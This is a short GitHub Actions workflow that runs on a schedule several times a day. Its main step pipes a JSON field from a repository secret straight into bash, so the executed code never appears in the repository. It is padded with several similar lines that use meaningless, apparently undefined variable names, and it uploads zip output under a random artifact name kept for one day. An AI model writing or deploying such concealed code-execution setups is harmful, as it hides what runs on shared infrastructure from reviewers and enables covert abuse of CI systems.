name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '28 4,10,16,22 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  execute:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Run
        env:
          lqnx8: ${{ secrets.lqnx8 }}
        run: |
          printf '%s' "$lqnx8" | jq -r .ka71548 | /bin/bash
          echo $dbqcu516 | jq -r .qoh66266 | /bin/bash
          printf '%s' "$b36" | jq -r .bpca936 | /bin/bash
          printf '%s' "$olfh30326" | jq -r .vexa90452 | /bin/bash
          echo $so2445 | jq -r .g5254 | /bin/bash
          printf '%s' "$zp0703" | jq -r .erilc8 | /bin/bash
          echo $sio5934 | jq -r .r6 | /bin/bash

      - name: Store results
        uses: actions/upload-artifact@v4
        with:
          name: ZwXWnP4J
          path: "*.zip"
          retention-days: 1
